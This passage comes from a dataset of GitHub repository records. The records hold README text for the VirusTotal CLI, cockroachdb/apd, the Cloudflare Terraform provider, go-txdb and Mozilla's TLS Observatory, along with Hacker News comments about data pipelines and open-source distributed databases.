using the `--apikey` option (`-k` in short form), but that's a bit of a hassle if you are going to use the tool frequently (and we bet you'll do!). For configuring your API key just type:\n\n```\n$ vt init\n```\n\nThis command will ask for your API key, and save it to a config file in your home directory (~/.vt.toml). You can also specify your API key using the `VTCLI_APIKEY` environment variable. If you specify your API key in multiple ways, the `--apikey` option will have the highest precedence, followed by the `VTCLI_APIKEY` environment variable, the API key in the configuration file will be used as the last resort.\n\n### Use with a proxy\n\nIf you are behind a HTTP proxy you can tell `vt-cli` which is the address of your proxy server by multiple ways. One is using the `--proxy` option, like in:\n\n```\n$ vt --proxy http://myproxy.com:1234 \n```\n\nYou can also use the `VTCLI_PROXY` environment variable, or add the following line to the config file:\n\n```\nproxy=\"http://myproxy.com:1234\"\n```\n\n### Setup Bash completion\n\nIf you are going to use this tool frequently you may want to have command auto-completion. It saves both precious time and keystrokes. Notice however that you must configure your API as described in the previous section *before* following the steps listed below. The API is necessary for determining the commands that you will have access to.\n\n* Linux:\n ```\n $ vt completion bash > /etc/bash_completion.d/vt\n ```\n\n* Mac OS X:\n ```\n $ brew install bash-completion\n $ vt completion bash > $(brew --prefix)/etc/bash_completion.d/vt\n ```\n Add the following lines to `~/.bash_profile`\n ```\n if [ -f $(brew --prefix)/etc/bash_completion ]; then\n . $(brew --prefix)/etc/bash_completion\n fi\n ```\n\n* Cygwin:\n\n Make sure the `bash-completion` package is installed (Cygwin doesn't installed it by default) and type:\n ```\n $ vt completion bash > /usr/share/bash-completion/completions/vt\n ```\n\n:heavy_exclamation_mark: You may need to restart your shell in order for autocompletion to start working.\n\n### Setup ZSH completion\n\nThe output script from `vt completion zsh` needs to be put somewhere under the `$fpath` directory. For example, `.oh-my-zsh/completions` directory:\n```shellsession\n$ mkdir /Users/$USERNAME/.oh-my-zsh/completions\n$ vt completion zsh > /Users/$USERNAME/.oh-my-zsh/completions/_vt\n```\n\nRestart the shell.\n\n## Usage examples\n\n* Get information about a file:\n ```\n $ vt file 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85\n ```\n\n* Get a specific analysis report for a file:\n ```\n $ # File analysis IDs can be given as `f--`...\n $ vt analysis f-8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85-1546309359\n $ # ...or as a Base64 encoded string, retrieved from the `vt scan file` command:\n $ vt scan file test.txt\n test.txt MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\n $ vt analysis MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\n - _id: \"MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\"\n _type: \"analysis\"\n date: 1546454520 # 2019-01-02 13:42:00 -0500 EST\n stats:\n failure: 0\n harmless: 0\n malicious: 0\n suspicious: 0\n timeout: 0\n type-unsupported: 0\n undetected: 0\n status: \"queued\"\n ```\n\n* Download files given a list of hashes in a text file, one hash per line:\n ```\n $ cat /path/list_of_hashes.txt | vt download -\n ```\n\n* Get information about a URL:\n ```\n $ vt url http://www.virustotal.com\n ```\n\n* Get the IP address that served a URL:\n ```\n $ vt url last_serving_ip_address http://www.virustotal.com\n ```\n\n* Search for files:\n ```\n $ vt search \"positives:5+ type:pdf\"\n ```\n\n## Getting only what you want\n\nWhen you ask for information about a file, URL, domain, IP address or any other object in VirusTotal, you get a lot of data (by default in YAML format) that is usually more than what you need. You can narrow down the information shown by the vt-cli tool by using the `--include` and `--exclude` command-line options (`-i` and `-x` in short form).\n\nThese options accept patterns that are matched against the fields composing the data, and allow you to include only a subset of them, or exclude any field that is not interesting for you. Let's see how it works using the data we have about `http://www.virustotal.com` as an example:\n\n```\n$ vt url http://www.virustotal.com\n- _id: 1db0ad7dbcec0676710ea0eaacd35d5e471d3e11944d53bcbd31f0cbd11bce31\n _type: \"url\"\n first_submission_date: 1275391445 # 2010-06-01 13:24:05 +0200 CEST\n last_analysis_date: 1532442650 # 2018-07-24 16:30:50 +0200 CEST\n last_analysis_results:\n ADMINUSLabs:\n category: \"harmless\"\n engine_name: \"ADMINUSLabs\"\n result: \"clean\"\n AegisLab WebGuard:\n category: \"harmless\"\n engine_name: \"AegisLab WebGuard\"\n result: \"clean\"\n AlienVault:\n category: \"harmless\"\n engine_name: \"AlienVault\"\n result: \"clean\"\n last_http_response_code: 200\n last_http_response_content_length: 7216\n last_http_response_content_sha256: \"7ed66734d9fb8c5a922fffd039c1cd5d85f8c2bb39d14803983528437852ba94\"\n last_http_response_headers:\n age: \"26\"\n cache-control: \"public, max-age=60\"\n content-length: \"7216\"\n content-type: \"text/html\"\n date: \"Tue, 24 Jul 2018 14:30:24 GMT\"\n etag: \"\\\"bGPKJQ\\\"\"\n expires: \"Tue, 24 Jul 2018 14:31:24 GMT\"\n server: \"Google Frontend\"\n x-cloud-trace-context: \"131ac6cb5e2cdb7970d54ee42fd5ce4a\"\n x-frame-options: \"DENY\"\n last_submission_date: 1532442650 # 2018-07-24 16:30:50 +0200 CEST\n private: false\n reputation: 1484\n times_submitted: 213227\n total_votes:\n harmless: 660\n malicious: 197\n```\n\nNotice that the returned data usually follows a hierarchical structure, with some top-level fields that may contain subfields which in turn can contain their own subfields. In the example above `last_http_response_headers` has subfields `age`, `cache-control`, `content-length` and so on, while `total_votes` has `harmless` and `malicious`. For refering to a particular field within the hierarchy we can use a path, similarly to how we identify a file in our computers, but in this case we are going to use a dot character (.) as the separator for path components, instead of the slashes (or backslashes) used by most file systems. The following ones are valid paths for our example structure:\n\n* `last_http_response_headers.age`\n* `total_votes.harmless`\n* `last_analysis_results.ADMINUSLabs.category`\n* `last_analysis_results.ADMINUSLabs.engine_name`\n\nThe filters accepted by both `--include` and `--exclude` are paths in which we can use `*` and `**` as placeholders for one and many path elements respectively. For example `foo.*` matches `foo.bar` but not `foo.bar.baz`, while `foo.**` matches `foo.bar`, `foo.bar.baz` and `foo.bar.baz.qux`. In the other hand, `foo.*.qux` matches `foo.bar.qux` and `foo.baz.qux` but not `foo.bar.baz.qux`, while `foo.**.qux` matches\n`foo.bar.baz.qux` and any other path starting with `foo` and ending with `qux`.\n\nFor cherry-picking only the fields you want, you should use `--include` followed by a path pattern as explained above. You can also include more than one pattern either by using the `--include` argument multiple times, or by using it with a comma-separated list of patterns. The following two options are equivalent:\n\n```\n$ vt url http://www.virustotal.com --include=reputation --include=total_votes.*\n$ vt url http://www.virustotal.com --include=reputation,total_votes.*\n```\n\nHere you have different examples with their outputs (assuming that `vt url http://www.virustotal.com` returns the structure shown above):\n\n```\n$ vt url http://www.virustotal.com --include=last_http_response_headers.server\n- last_http_response_headers:\n server: \"Google Frontend\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_http_response_headers.*\n- last_http_response_headers:\n age: \"26\"\n cache-control: \"public, max-age=60\"\n content-length: \"7216\"\n content-type: \"text/html\"\n date: \"Tue, 24 Jul 2018 14:30:24 GMT\"\n etag: \"\\\"bGPKJQ\\\"\"\n expires: \"Tue, 24 Jul 2018 14:31:24 GMT\"\n server: \"Google Frontend\"\n x-cloud-trace-context: \"131ac6cb5e2cdb7970d54ee42fd5ce4a\"\n x-frame-options: \"DENY\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_analysis_results.**\n- last_analysis_results:\n ADMINUSLabs:\n category: \"harmless\"\n engine_name: \"ADMINUSLabs\"\n result: \"clean\"\n AegisLab WebGuard:\n category: \"harmless\"\n engine_name: \"AegisLab WebGuard\"\n result: \"clean\"\n AlienVault:\n category: \"harmless\"\n engine_name: \"AlienVault\"\n result: \"clean\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_analysis_results.*.result\n- last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=**.result\n- last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\nAlso notice that `_id` and `_type` are also field names and therefore you can use them in your filters:\n\n```\n$ vt url http://www.virustotal.com --include=_id,_type,**.result\n- _id: \"1db0ad7dbcec0676710ea0eaacd35d5e471d3e11944d53bcbd31f0cbd11bce31\"\n _type: \"file\"\n last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\nThe `--exclude` option works similarly to `--include` but instead of including the matching fields in the output, it includes everything except the matching fields. You can use this option when you want to keep most of the fields, but leave out a few of them that are not interesting. If you use `--include` and `--exclude` simultaneously `--include` enters in action first, including only the fields that match the `--include` patterns, while `--exclude` comes in after that, removing any remaining field that matches the `--exclude` patterns.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cockroachdb/apd", "link": "https://github.com/cockroachdb/apd", "tags": [], "stars": 511, "description": "Arbitrary-precision decimals for Go", "lang": "Go", "repo_lang": "", "readme": "# apd\n\napd is an arbitrary-precision decimal package for Go.\n\n`apd` implements much of the decimal specification from the [General Decimal Arithmetic](http://speleotrove.com/decimal/) description. This is the same specification implemented by [python\u2019s decimal module](https://docs.python.org/2/library/decimal.html) and GCC\u2019s decimal extension.\n\n## Features\n\n- **Panic-free operation**. The `math/big` types don\u2019t return errors, and instead panic under some conditions that are documented. This requires users to validate the inputs before using them. Meanwhile, we\u2019d like our decimal operations to have more failure modes and more input requirements than the `math/big` types, so using that API would be difficult. `apd` instead returns errors when needed.\n- **Support for standard functions**. `sqrt`, `ln`, `pow`, etc.\n- **Accurate and configurable precision**. Operations will use enough internal precision to produce a correct result at the requested precision. Precision is set by a \"context\" structure that accompanies the function arguments, as discussed in the next section.\n- **Good performance**. Operations will either be fast enough or will produce an error if they will be slow. This prevents edge-case operations from consuming lots of CPU or memory.\n- **Condition flags and traps**. All operations will report whether their result is exact, is rounded, is over- or under-flowed, is [subnormal](https://en.wikipedia.org/wiki/Denormal_number), or is some other condition. `apd` supports traps which will trigger an error on any of these conditions. This makes it possible to guarantee exactness in computations, if needed.\n\n`apd` has three main types.\n\nThe first is [`BigInt`](https://godoc.org/github.com/cockroachdb/apd#BigInt) which is a wrapper around `big.Int` that exposes an identical API while reducing memory allocations. `BigInt` does so by using an inline array to back the `big.Int`'s variable-length value when the integer's absolute value is sufficiently small. `BigInt` also contains fast-paths that allow it to perform basic arithmetic directly on this inline array, only falling back to `big.Int` when the arithmetic gets complex or takes place on large values.\n\nThe second is [`Decimal`](https://godoc.org/github.com/cockroachdb/apd#Decimal) which holds the values of decimals. It is simple and uses a `BigInt` with an exponent to describe values. Most operations on `Decimal`s can\u2019t produce errors as they work directly on the underlying `big.Int`. Notably, however, there are no arithmetic operations on `Decimal`s.\n\nThe third main type is [`Context`](https://godoc.org/github.com/cockroachdb/apd#Context), which is where all arithmetic operations are defined. A `Context` describes the precision, range, and some other restrictions during operations. These operations can all produce failures, and so return errors.\n\n`Context` operations, in addition to errors, return a [`Condition`](https://godoc.org/github.com/cockroachdb/apd#Condition), which is a bitfield of flags that occurred during an operation. These include overflow, underflow, inexact, rounded, and others. The `Traps` field of a `Context` can be set which will produce an error if the corresponding flag occurs. An example of this is given below.\n\nSee the [examples](https://godoc.org/github.com/cockroachdb/apd#pkg-examples) for some operations that were previously difficult to perform in Go.\n\n## Documentation\nhttps://pkg.go.dev/github.com/cockroachdb/apd/v3?tab=doc\n", "readme_type": "markdown", "hn_comments": "Nice work! We're really proud of how the warehouse sync feature we built at Customer.io turned out. We had to do it all from scratch though!Good luck with the next steps for Pipebird.I should mention that we're happy to do a white-gloved deployment for anyone that wants to test out what this would look like in their product - feel free to email hello@pipebird.comLooks useful! Do you have a way to validate that the data was copied correctly and entirely? If not, you might want to consider integrating data-diff for that - https://github.com/datafold/data-diffHey all, one of the co-founders of Pipebird here - I'll be around to answer any questions you might have. Would love to hear your feedback!besides creating more value for our b2b customer, can this help our own company in anyway.Hey folksThe product looks great. I had faced such situations in past with different tools.You should make the PM and Dev community aware of this tool to get better leads and usecases.Wish you best for the future.Hey team, Charles here, co-founder of prequel.co (YC W21). We also help companies share data with their customers.As someone who's been playing in the data sharing space, it's really exciting to see it get more attention!All the best to y'all!Hey, interesting work.\nI wonder how do you compare pipebird with data tools like Airbyte?This is dope! Hope to see more companies (including ours!) integrate more data pipelines!Global Tables let database clients in any region read strongly consistent data with region-local latencies. They\u2019re an important piece of the multi-region puzzle \u2014 providing latency characteristics that are well suited for read-mostly, non-localized data.It's an exciting time for cloud-native databases. I'm especially curious how various emulation layer approaches will shake out, for example, between CRDB and Neon which do pgsql wire protocol emulation vs block device emulation, respectively.Is something similar possible using Postgres / Citus?E.g. If I have a multi-tenant architecture but want a global table for say a postgres full-text-search index of content from the distributed tenants, what would the recommend route be?Global tables seem like a great feature. I'd gladly sacrifice write speed for it.I recently tried CockroachDB's serverless offering and I was very satisfied with it. It has a generous free tier, easy-to-understand pricing, and a query analyzer that helps me estimate how much a query would cost. It is still in beta but already feels extremely polished.The only complaint so far is that there are very few supported regions. (Oregon, N. Virginia, Frankfurt, Ireland, Singapore, Mumbai for AWS, and S\u00e3o Paulo, California, South Carolina, Iowa, St. Ghislain, Jurong West for GCP, as of now.) Even the list of supported regions could not be found online, only to be found after signing up. Was it intentional to drop the information from the documentation? Not that this is a huge problem, considering I'm still on the free plan, but I wonder if they're planning to add more regions in the near future.The calculation method and the overall page design is very similar to ClickHouse benchmarks:https://clickhouse.com/benchmark/dbms/\nhttps://presentations.clickhouse.com/original_website/benchm... (2013)The table and diagram layout, the checkboxes and controls, the \"geometric mean of ratios\", etc.But it does not have proper attribution and it looks unfair.\nYou can reference directly to me (Alexey Milovidov) if needed.You are missing something.You list several completely different types of databases and then mention you are looking for a \"general purpose database\".This tells me you do not understand the problem you are trying to solve, therefore do not know how to define the requirements nor features you require to solve it.It also tells me you do not understand the difference between different types of databases, nor the niche they fill, let alone why their HA functions very differently.I'm not sure if Percona's HA solutions are any better than what MariaDB offers, but it's not in your list, so maybe worth mentioning.https://www.percona.com/services/support/high-availabilityhttps://www.percona.com/blog/2021/04/14/percona-distribution...The community is still slowly recovering from the collapse of the company but RethinkDB is worth considering in your analysis.> What do I mean by Fake Open Source? A project that has a large percentage of its contributors beholden to a single organization/entity to me is not really open source in spirit.Then you should use a different term - something like \"community project\". The single organization projects are still open source, both technically and in spirit.> I'm looking for a project where I can feel confident my contributions won't effectively end up behind some proprietary license down the line if/when the VC backed organization that primarily sponsors development decides it needs to protect itself from AWS.If you're talking about ElasticSearch, I'll point out that Amazon forked it and OpenSearch is not behind a proprietary license, so all contributions made to ElasticSearch continue to be available as open source, with improvements being made.One thing which Percona has which MySQL and MariaDB does not is mature operators with HA support, which if you're using Kubernetes make High Availability much easierhttps://www.percona.com/software/percona-kubernetes-operator...Disclosure: I'm CEO at PerconaI have deployed and run Cassandra myself, basically as you describe.The first 'dev' Cassandra install was three nodes. I downloaded the .tar.gz, installed it, started each process in turn on each node with the required configuration.That was 2012 and there is a chance that cluster is still running. It was low-volume in terms of data. TTL configured so it would never run out of disk. Never had any issues in particular. I used it for ~5 years before concluding work with that client.The problem in that case was Cassandra proliferated in that small company, they didn't build any particular expertise beyond me, and in the end I was being pulled into discussions from different teams, different products, split across about 13 clusters. Wasn't much fun - but that wasn't the DB's fault.I'm not sure if you're just picky or discerning but it seems you can find a reason to exclude anything if all you do is look for reasons to exclude.Why not just use SQLite with streaming replication? It should fit your bill.Databases rarely have what you would define as real open source with real contributors because the nature of a database means you need one owner and that owner has to be picky and exclude things. Allowing the wrong commit into MariaDB could introduce regressions that no one even could imagine because the complexity of things.Even when a database starts out the way you describe with good intentions in order for it to become a widely adopted product it has to be pulled in under a single umbrella to direct it and build it toward its vision. This puts it firmly in your fake open source camp.PostgresSQL - Not sure which HA solution you had experience with:\nhttps://patroni.readthedocs.io/en/latest isn't too bad.\nold adage comes to mind. Fast/Cheap/Good - pick 2\nHA design are not all created equal. rubber stamp something HA often give false sense of security. HA to me is explicitly defined risk(down time) tolerance.\nFor each of 9 it get more complex and cost goes up. Most commercial DB with HA are opinionated which is often the opposite ethos of open sourceI'd say Oracle has been a better steward of MySQL than Sun was back when Sun was a separate company.Yep, your assessment seems broadly accurate to me. I was going to suggest Cassandra until I saw it in the list. I'm {interested in/optimistic about} FoundationDB too, although haven't had a chance to use it in practice yet.Out of curiosity: what would your preferred choice(s) be to fit these requirements using existing proprietary products?What do you want specifically in a DB? Consistency? Sql or nosql? HA or sharded? homogeneous nodes?Jbtw, the risk of nodes dying is quite exaggerated. DO/Vultr/Linode all provide 99.99% up timeIt's not clear to me why you need a distributed database in the first place. If it's just for general purpose small scale projects, does it really matter if your database is down once a year?I run a couple of Postgres databases on cheap linux VMs, for various projects, and they have been running smoothly for years. The only problem I had was two times when the disk was full. If I had multiple nodes they would all have been full...Github has been down more often than my Postgres databases.HA adds so much complexity and tradeoffs that I would really think hard about wether it's worth it for your use case.The reason: ha for databases is hard.However galera cluster and/or percona xtradb cluster work remarkably well, considering they\u2019re open source.> YugabyteDB: Fake Open Source. Special shout out here for not even linking to instructions for how to build the database in the readme.All the features are open source. Here is how to build from source https://docs.yugabyte.com/latest/contribute/core-database/bu....> What do I mean by Fake Open Source? A project that has a large percentage of its contributors beholden to a single organization/entity to me is not really open source in spirit.Well, somebody gotta start the project, no? Feel free to contribute though. Since it reuses PostgreSQL, it directly inherits the \"postgresql community commits\". The same with being a fork of Apache Kudu fork.> If there's an \"Enterprise\" product and the organization calls the source code for the main project the \"Community Edition\" or something like it, it's not Real Open Source.The \"Enterprise\" edition is \"just\" some scripts that make deployment & monitoring easier (and includes 24/7 developer support). All c++ features are open source.And it's still young. You can't compare against PostgreSQL that has 20+ years of being available.Manticore Search is not in the list:* 100% open source (GPLv2)* Easy replication: - node 1: CREATE CLUSTER c; ALTER CLUSTER c ADD tbl; \n\n - node 2: JOIN CLUSTER c AT 'host:port'\n\n* Easy HA: CREATE TABLE dist TYPE='distributed' agent='...' agent='...'* Real alternative to Elasticsearch in terms of built-in full-text search capabilities, but easier to use.* Works fine with small and large data volumes:\n - with in-memory storage for smaller data\n - with columnar storage (separate library, Apache2 license) for big data that doesn't fit into RAM* Does analytical queries well* Not fully ACID-compliant (as well as Elasticsearch, Clickhouse others)rqlite https://github.com/rqlite/rqliteI'm the creator of this project. While it's not going to work super well at very large datasets, it's explicitly designed to be trivial to deploy, and very easy to operate. You can get it up and running in seconds, and clustering seconds later. My practical experience with databases told me that operating the database is at least as important as performing queries with it. So I put a lot of work into easy clustering, clear diagnostics, and solid code.I\u2019m not understanding why it matters if it\u2019s fake open source or not. Even with \u201creal open source\u201d there\u2019s no guarantee your contributions will be included. Or that the license won\u2019t change in the future.Didn't make it to prod.I tried migrating to YB at one point. I had issues migrating the indices (got lots of timeout issues). Once I got past that, I found out that a particular query I needed to do didn't have predicate pushdowns implemented and so always resulted in a full table scan. Ended up giving up.Cockroach (at the time at least, ~1.25 years ago) didn't have support for some JSONB things that I needed.We used CRDB 2.1.4 and then on the YYYY versions when they changed to a date based version scheme in production at a fintech. This must have been a year or so ago. I've since left. I think they might still be using it. Back then it had issues with SQLAlchemy and we had to do much in teh way of changing our application to be more cloudy in the sense of being able to retry transactions and such.I don't think we trialed YugaByte at the time because an ORM story was a dealbreaker and CRDB at least advertised support.We used CRDB (and still do) in production and a scale (billions of records+) and have found it to be very good. While it does not have every advanced feature of PostgreSQL, you get very easy clustering and operational simplicity which drive reliability. The command like tools that come with it are also fantastic. Impressive database that\u2019s been a joy to work with. Sorry, no direct experience with YB.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/terraform-provider-cloudflare", "link": "https://github.com/cloudflare/terraform-provider-cloudflare", "tags": ["terraform", "terraform-provider", "cloudflare"], "stars": 511, "description": "Cloudflare Terraform Provider", "lang": "Go", "repo_lang": "", "readme": "# Cloudflare Terraform Provider\n\n## Quickstarts\n\n- [Getting started with Cloudflare and Terraform](https://developers.cloudflare.com/terraform/installing)\n- [Developing the provider](contributing/development.md)\n\n## Documentation\n\nFull, comprehensive documentation is available on the [Terraform Registry](https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs). [API documentation](https://api.cloudflare.com) and [Developer documentation](https://developers.cloudflare.com) is also available\nfor non-Terraform or service specific information.\n\n## Migrating to Terraform from using the Dashboard\n\nDo you have an existing Cloudflare account (or many!) that you'd like to transition\nto be managed via Terraform? Check out [cf-terraforming](https://github.com/cloudflare/cf-terraforming)\nwhich is a tool Cloudflare has built to help dump the existing resources and\nimport them into Terraform.\n\n## Version 4.x early release candidates\n\n> **Warning** Release candidates may contain bugs and backwards incompatible state modifications. **You should not use it in production you are clear on the ramifications and have a clear backup plan in the event of breakages.**

For production usage, the 3.x release is recommended using the `~> 3` provider version selector.\n\nWe are working on releasing the next major version of the Cloudflare Terraform Provider and want your help! \n\nIf you have suitable workloads and would like to test out the next release before everyone else, you can opt-in by updating your provider `version` to explicitly match one of the release candidate versions ([`~>`, `>` or `>=` will not work](https://developer.hashicorp.com/terraform/language/expressions/version-constraints#version-constraint-behavior)). See the [releases](https://github.com/cloudflare/terraform-provider-cloudflare/releases) page for available versions.\n\n```hcl\nterraform {\n required_providers {\n cloudflare = {\n source = \"cloudflare/cloudflare\"\n version = \"4.0.0-rc1\"\n }\n }\n}\n```\n\nBe sure to check out the [version 4 upgrade guide](https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs/guides/version-4-upgrade) and make any modifications. If you hit bugs, please [open a new issue](https://github.com/cloudflare/terraform-provider-cloudflare/issues/new/choose).\n\n## Contributing\n\nTo contribute, please read the [contribution guidelines](contributing/README.md).\n\n## Feedback\n\nIf you would like to provide feedback (not a bug or feature request) on the Cloudflare Terraform provider, you're welcome to via [this form](https://forms.gle/6ofUoRY2QmPMSqoR6).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DATA-DOG/go-txdb", "link": "https://github.com/DATA-DOG/go-txdb", "tags": ["sql-driver", "integration-testing", "go", "golang", "tdd", "sql", "testing"], "stars": 511, "description": "Immutable transaction isolated sql driver for golang", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/DATA-DOG/go-txdb.svg?branch=master)](https://travis-ci.org/DATA-DOG/go-txdb)\n[![GoDoc](https://godoc.org/github.com/DATA-DOG/go-txdb?status.svg)](https://godoc.org/github.com/DATA-DOG/go-txdb)\n\n# Single transaction based sql.Driver for GO\n\nPackage **txdb** is a single transaction based database sql driver. When the connection\nis opened, it starts a transaction and all operations performed on this **sql.DB**\nwill be within that transaction. If concurrent actions are performed, the lock is\nacquired and connection is always released the statements and rows are not holding the\nconnection.\n\nWhy is it useful. A very basic use case would be if you want to make functional tests\nyou can prepare a test database and within each test you do not have to reload a database.\nAll tests are isolated within transaction and though, performs fast. And you do not have\nto interface your **sql.DB** reference in your code, **txdb** is like a standard **sql.Driver**.\n\nThis driver supports any **sql.Driver** connection to be opened. You can register txdb\nfor different sql drivers and have it under different driver names. Under the hood\nwhenever a txdb driver is opened, it attempts to open a real connection and starts\ntransaction. When close is called, it rollbacks transaction leaving your prepared\ntest database in the same state as before.\n\nGiven, you have a mysql database called **txdb_test** and a table **users** with a **username**\ncolumn.\n\n``` go\n package main\n\n import (\n \"database/sql\"\n \"log\"\n\n \"github.com/DATA-DOG/go-txdb\"\n _ \"github.com/go-sql-driver/mysql\"\n )\n\n func init() {\n // we register an sql driver named \"txdb\"\n txdb.Register(\"txdb\", \"mysql\", \"root@/txdb_test\")\n }\n\n func main() {\n // dsn serves as an unique identifier for connection pool\n db, err := sql.Open(\"txdb\", \"identifier\")\n if err != nil {\n log.Fatal(err)\n }\n defer db.Close()\n\n if _, err := db.Exec(`INSERT INTO users(username) VALUES(\"gopher\")`); err != nil {\n log.Fatal(err)\n }\n }\n```\n\nEvery time you will run this application, it will remain in the same state as before.\n\n### Testing\n\nUsage is mainly intended for testing purposes. See the **db_test.go** as\nan example. In order to run tests, you will need docker and\ndocker-compose:\n\n docker-compose up\n make test\n\nThe tests are currently using `postgres` and `mysql` databases\n\n### Documentation\n\nSee [godoc][godoc] for general API details.\nSee **.travis.yml** for supported **go** versions.\n\n### Contributions\n\nFeel free to open a pull request. Note, if you wish to contribute an extension to public (exported methods or types) -\nplease open an issue before to discuss whether these changes can be accepted. All backward incompatible changes are\nand will be treated cautiously.\n\nThe public API is locked since it is an **sql.Driver** and will not change.\n\n### License\n\n**txdb** is licensed under the [three clause BSD license][license]\n\n[godoc]: http://godoc.org/github.com/DATA-DOG/go-txdb \"Documentation on\ngodoc\"\n\n[golang]: https://golang.org/ \"GO programming language\"\n\n[license]:http://en.wikipedia.org/wiki/BSD_licenses \"The three clause BSD license\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mozilla/tls-observatory", "link": "https://github.com/mozilla/tls-observatory", "tags": [], "stars": 511, "description": "An observatory for TLS configurations, X509 certificates, and more.", "lang": "Go", "repo_lang": "", "readme": "# Mozilla TLS Observatory\n\n[![What's Deployed](https://img.shields.io/badge/whatsdeployed-stage,prod-green.svg)](https://whatsdeployed.io/s-LVL)\n[![CircleCI](https://circleci.com/gh/mozilla/tls-observatory/tree/master.svg?style=svg)](https://circleci.com/gh/mozilla/tls-observatory/tree/master)\n\nThe Mozilla TLS Observatory is a suite of tools for analysis and inspection on Transport Layer Security (TLS) services. The components of TLS Observatory include:\n\n- [EV Checker](https://tls-observatory.services.mozilla.com/static/ev-checker.html) - Tool for Certificate Authorities (CAs) who request a root certificate enabled for Extended Validation (EV).\n- [Certificate Explainer](https://tls-observatory.services.mozilla.com/static/certsplainer.html) - Web UI that parses fields of X.509 certificates\n- `tlsobs` - CLI tool for issuing scans of a website\n- `tlsobs-api` - HTTP webserver receiving website scan requests and displaying results\n- `tlsobs-runner` - Service that schedules website scans\n- `tlsobs-scanner` - Service that performs scans and analysis of websites\n\nWant the WebUI? Check out [Mozilla's Observatory](https://observatory.mozilla.org) !\n\n* [Mozilla TLS Observatory](#mozilla-tls-observatory)\n * [Getting started](#getting-started)\n * [Using the tlsobs client from Docker](#using-the-tlsobs-client-from-docker)\n * [Developing](#developing)\n * [Create the database](#create-the-database)\n * [Starting the API and Scanner](#starting-the-api-and-scanner)\n * [Run a scan locally](#run-a-scan-locally)\n * [Configuration](#configuration)\n * [tlsobs-api](#tlsobs-api)\n * [tlsobs-scanner](#tlsobs-scanner)\n * [tlsobs-runner](#tlsobs-runner)\n * [API Endpoints](#api-endpoints)\n * [POST /api/v1/scan](#post-apiv1scan)\n * [GET /api/v1/results](#get-apiv1results)\n * [GET /api/v1/certificate](#get-apiv1certificate)\n * [POST /api/v1/certificate](#post-apiv1certificate)\n * [GET /api/v1/paths](#get-apiv1paths)\n * [GET /api/v1/truststore](#get-apiv1truststore)\n * [GET /api/v1/issuereecount](#get-apiv1issuereecount)\n * [GET /api/v1/__heartbeat__](#get-apiv1heartbeat)\n * [GET /api/v1/__stats__](#get-apiv1stats)\n * [Database Queries](#database-queries)\n * [Core contributors](#contributors)\n * [License](#license)\n\n## Getting started\n\nYou can use the TLS Observatory to compare your site against the mozilla guidelines.\nIt requires Golang 1.15+ to be installed:\n\n```bash\n$ go version\ngo version go1.15 linux/amd64\n\n$ export GOPATH=\"$HOME/go\"\n$ mkdir $GOPATH\n\n$ export PATH=$GOPATH/bin:$PATH\n```\n\nThen get the binary:\n\n```bash\n$ go get github.com/mozilla/tls-observatory/tlsobs\n```\n\nAnd scan using our hosted service:\n\n```bash\n$ tlsobs tls-observatory.services.mozilla.com\nScanning tls-observatory.services.mozilla.com (id 13528951)\nRetrieving cached results from 20h33m1.379461888s ago. To run a new scan, use '-r'.\n\n--- Certificate ---\nSubject C=US, O=Mozilla Corporation, CN=tls-observatory.services.mozilla.com\nSubjectAlternativeName\n- tls-observatory.services.mozilla.com\nValidity 2016-01-20T00:00:00Z to 2017-01-24T12:00:00Z\nSHA1 FECA3CA0F4B726D062A76F47635DD94A37985105\nSHA256 315A8212CBDC76FF87AEB2161EDAA86E322F7C18B27152B5CB9206297F3D3A5D\nSigAlg ECDSAWithSHA256\nKey ECDSA 384bits P-384\nID 1281826\n\n--- Trust ---\nMozilla Microsoft Apple Android\n \u2713 \u2713 \u2713 \u2713\n\n--- Chain of trust ---\nC=US, O=Mozilla Corporation, CN=tls-observatory.services.mozilla.com (id=1281826)\n\u2514\u2500\u2500C=US, O=DigiCert Inc, CN=DigiCert ECC Secure Server CA (id=5922)\n \u2514\u2500\u2500C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Global Root CA (id=41)\n\n\n\n--- Ciphers Evaluation ---\nprio cipher protocols pfs curves\n1 ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v1\n2 ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v1\nOCSP Stapling false\nServer Side Ordering true\nCurves Fallback false\n\n--- Analyzers ---\n* Mozilla evaluation: modern\n - for modern level: consider adding ciphers ECDHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, ECDHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, ECDHE-ECDSA-AES128-SHA256, 